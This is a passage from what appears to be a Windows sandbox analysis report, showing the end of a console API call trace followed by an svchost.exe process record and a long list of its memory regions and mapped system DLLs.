file(s) moved.\r\n") returned 0x1a [0172.548] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12eadc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12eadc*=0x1a) returned 1 [0172.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.548] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.548] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.548] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.548] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.549] SetConsoleInputExeNameW () returned 0x1 [0172.549] GetConsoleOutputCP () returned 0x1b5 [0172.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.549] exit (_Code=0) Process: id = "298" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea161c0" os_pid = "0x358" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "271" os_parent_pid = "0xf38" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], 
"NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b277" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 23048 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23049 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23050 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23051 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23052 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23053 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 23054 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 23055 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 23056 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 23057 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 23058 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = 
"private_0x00000000000b0000" filename = "" Region: id = 23059 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 23060 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 23061 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 23062 start_va = 0x120000 end_va = 0x186fff entry_point = 0x120000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23063 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 23064 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 23065 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23066 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 23067 start_va = 0x3b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 23068 start_va = 0x4c0000 end_va = 0x53ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 23069 start_va = 0x540000 end_va = 0x932fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23070 start_va = 0x940000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" 
filename = "" Region: id = 23071 start_va = 0x980000 end_va = 0x981fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 23072 start_va = 0x990000 end_va = 0x993fff entry_point = 0x990000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 23073 start_va = 0x9a0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 23074 start_va = 0x9e0000 end_va = 0x9effff entry_point = 0x9e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 23075 start_va = 0xa20000 end_va = 0xa21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 23076 start_va = 0xa30000 end_va = 0xa33fff entry_point = 0xa30000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 23077 start_va = 0xa40000 end_va = 0xa40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 23078 start_va = 0xa50000 end_va = 0xa50fff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 23079 start_va = 0xa60000 end_va = 0xa6dfff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 23080 start_va = 0xa70000 end_va = 0xa70fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 23081 start_va = 0xac0000 end_va = 0xac0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 23082 start_va = 0xad0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 23083 start_va = 0xb10000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 23084 start_va = 0xb50000 end_va = 0xe1efff entry_point = 0xb50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 23085 start_va = 0xe20000 end_va = 0xe4ffff entry_point = 0xe20000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 23086 start_va = 0xe50000 end_va = 0xe8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 23087 start_va = 0xe90000 end_va = 0xe97fff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 23088 start_va = 0xea0000 end_va = 0xeaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 23089 start_va = 0xeb0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 23090 start_va = 0xec0000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 23091 start_va = 0xed0000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 23092 start_va = 0xf10000 end_va = 0xf10fff 
entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 23093 start_va = 0xf20000 end_va = 0xf3bfff entry_point = 0xf20000 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 23094 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 23095 start_va = 0xf80000 end_va = 0xf81fff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 23096 start_va = 0xf90000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 23097 start_va = 0xfd0000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 23098 start_va = 0x1010000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 23099 start_va = 0x1110000 end_va = 0x1110fff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 23100 start_va = 0x1120000 end_va = 0x1120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 23101 start_va = 0x1130000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 23102 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 23103 start_va = 0x1180000 end_va = 0x11bffff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 23104 start_va = 0x11c0000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" 
Region: id = 23105 start_va = 0x11d0000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 23106 start_va = 0x1210000 end_va = 0x1217fff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 23107 start_va = 0x1220000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 23108 start_va = 0x1230000 end_va = 0x126ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 23109 start_va = 0x1270000 end_va = 0x12d5fff entry_point = 0x1270000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 23110 start_va = 0x12e0000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 23111 start_va = 0x1360000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 23112 start_va = 0x1370000 end_va = 0x137ffff entry_point = 0x1370000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 23113 start_va = 0x1380000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 23114 start_va = 0x13c0000 end_va = 0x13cffff entry_point = 0x13c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: 
"c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 23115 start_va = 0x13d0000 end_va = 0x140ffff entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 23116 start_va = 0x1410000 end_va = 0x141ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 23117 start_va = 0x1420000 end_va = 0x1427fff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 23118 start_va = 0x1470000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 23119 start_va = 0x14b0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 23120 start_va = 0x14c0000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 23121 start_va = 0x1500000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 23122 start_va = 0x1510000 end_va = 0x1517fff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 23123 start_va = 0x1560000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 23124 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 23125 start_va = 0x15e0000 end_va = 0x16dffff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 23126 start_va = 0x16f0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 23127 start_va = 0x1710000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" 
Region: id = 23128 start_va = 0x1770000 end_va = 0x17affff entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 23129 start_va = 0x17b0000 end_va = 0x17bffff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 23130 start_va = 0x17f0000 end_va = 0x182ffff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 23131 start_va = 0x18d0000 end_va = 0x190ffff entry_point = 0x0 region_type = private name = "private_0x00000000018d0000" filename = "" Region: id = 23132 start_va = 0x1910000 end_va = 0x194ffff entry_point = 0x0 region_type = private name = "private_0x0000000001910000" filename = "" Region: id = 23133 start_va = 0x1950000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 23134 start_va = 0x1a30000 end_va = 0x1a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 23135 start_va = 0x1a70000 end_va = 0x1a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a70000" filename = "" Region: id = 23136 start_va = 0x1ab0000 end_va = 0x1aeffff entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 23137 start_va = 0x1b40000 end_va = 0x1b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b40000" filename = "" Region: id = 23138 start_va = 0x1b50000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 23139 start_va = 0x1b60000 end_va = 0x1b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 23140 start_va = 0x1b70000 end_va = 0x1b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b70000" filename = "" Region: id = 23141 
start_va = 0x1b80000 end_va = 0x1b8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 23142 start_va = 0x1b90000 end_va = 0x1b9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b90000" filename = "" Region: id = 23143 start_va = 0x1be0000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 23144 start_va = 0x1c20000 end_va = 0x1d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c20000" filename = "" Region: id = 23145 start_va = 0x1e00000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 23146 start_va = 0x1e90000 end_va = 0x1ecffff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 23147 start_va = 0x1ed0000 end_va = 0x1f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 23148 start_va = 0x1f10000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 23149 start_va = 0x1f90000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 23150 start_va = 0x2030000 end_va = 0x212ffff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 23151 start_va = 0x2130000 end_va = 0x232ffff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 23152 start_va = 0x2330000 end_va = 0x272ffff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 23153 start_va = 0x2730000 end_va = 0x2f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 23154 start_va = 0x2f30000 end_va = 
0x2f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 23155 start_va = 0x2f70000 end_va = 0x302ffff entry_point = 0x2f70000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 23156 start_va = 0x3080000 end_va = 0x30bffff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 23157 start_va = 0x3100000 end_va = 0x313ffff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 23158 start_va = 0x3140000 end_va = 0x410ffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 23159 start_va = 0x41e0000 end_va = 0x41effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041e0000" filename = "" Region: id = 23160 start_va = 0x41f0000 end_va = 0x41fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 23161 start_va = 0x4200000 end_va = 0x420ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004200000" filename = "" Region: id = 23162 start_va = 0x4210000 end_va = 0x421ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004210000" filename = "" Region: id = 23163 start_va = 0x4220000 end_va = 0x422ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004220000" filename = "" Region: id = 23164 start_va = 0x4230000 end_va = 0x423ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004230000" filename = "" Region: id = 23165 start_va = 0x4280000 end_va = 0x437ffff entry_point = 0x0 region_type = private name = "private_0x0000000004280000" filename = "" Region: id = 23166 start_va = 0x4380000 end_va = 0x447ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000004380000" filename = "" Region: id = 23167 start_va = 0x44e0000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 23168 start_va = 0x45a0000 end_va = 0x45dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 23169 start_va = 0x45e0000 end_va = 0x461ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045e0000" filename = "" Region: id = 23170 start_va = 0x4620000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 23171 start_va = 0x4660000 end_va = 0x469ffff entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 23172 start_va = 0x46a0000 end_va = 0x46dffff entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 23173 start_va = 0x47a0000 end_va = 0x47dffff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 23174 start_va = 0x4800000 end_va = 0x483ffff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 23175 start_va = 0x4890000 end_va = 0x48cffff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 23176 start_va = 0x49c0000 end_va = 0x49cffff entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 23177 start_va = 0x49d0000 end_va = 0x4acffff entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 23178 start_va = 0x4ad0000 end_va = 0x4bcffff entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 23179 start_va = 0x4bd0000 end_va = 0x4ccffff entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" 
filename = "" Region: id = 23180 start_va = 0x4cd0000 end_va = 0x4dcffff entry_point = 0x0 region_type = private name = "private_0x0000000004cd0000" filename = "" Region: id = 23181 start_va = 0x4dd0000 end_va = 0x4fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 23182 start_va = 0x4fd0000 end_va = 0x5fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004fd0000" filename = "" Region: id = 23183 start_va = 0x5fd0000 end_va = 0x60cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005fd0000" filename = "" Region: id = 23184 start_va = 0x60d0000 end_va = 0x61cffff entry_point = 0x0 region_type = private name = "private_0x00000000060d0000" filename = "" Region: id = 23185 start_va = 0x6cc60000 end_va = 0x6ce35fff entry_point = 0x6cc60000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 23186 start_va = 0x6ce40000 end_va = 0x6cfe2fff entry_point = 0x6ce40000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 23187 start_va = 0x6e460000 end_va = 0x6e474fff entry_point = 0x6e460000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 23188 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 23189 start_va = 0x6e830000 end_va = 0x6e87bfff entry_point = 0x6e830000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 23190 start_va = 0x6e880000 end_va = 0x6e896fff 
entry_point = 0x6e880000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 23191 start_va = 0x6e8a0000 end_va = 0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 23192 start_va = 0x6e900000 end_va = 0x6e949fff entry_point = 0x6e900000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 23193 start_va = 0x6e950000 end_va = 0x6e963fff entry_point = 0x6e950000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 23194 start_va = 0x6e970000 end_va = 0x6e9aafff entry_point = 0x6e970000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 23195 start_va = 0x6e9b0000 end_va = 0x6e9b5fff entry_point = 0x6e9b0000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 23196 start_va = 0x6ea30000 end_va = 0x6ea73fff entry_point = 0x6ea30000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 23197 start_va = 0x6ea80000 end_va = 0x6eb41fff entry_point = 0x6ea80000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 23198 start_va = 0x6eb50000 end_va = 0x6eb6afff entry_point = 0x6eb50000 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" 
(normalized: "c:\\windows\\system32\\browser.dll") Region: id = 23199 start_va = 0x6eb70000 end_va = 0x6ebd6fff entry_point = 0x6eb70000 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 23200 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 23201 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 23202 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 23203 start_va = 0x6ee90000 end_va = 0x6ee9ffff entry_point = 0x6ee90000 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 23204 start_va = 0x6eea0000 end_va = 0x6eecbfff entry_point = 0x6eea0000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 23205 start_va = 0x6eed0000 end_va = 0x6eee5fff entry_point = 0x6eed0000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 23206 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 23207 start_va = 0x6f5c0000 end_va = 0x6f5f1fff entry_point 
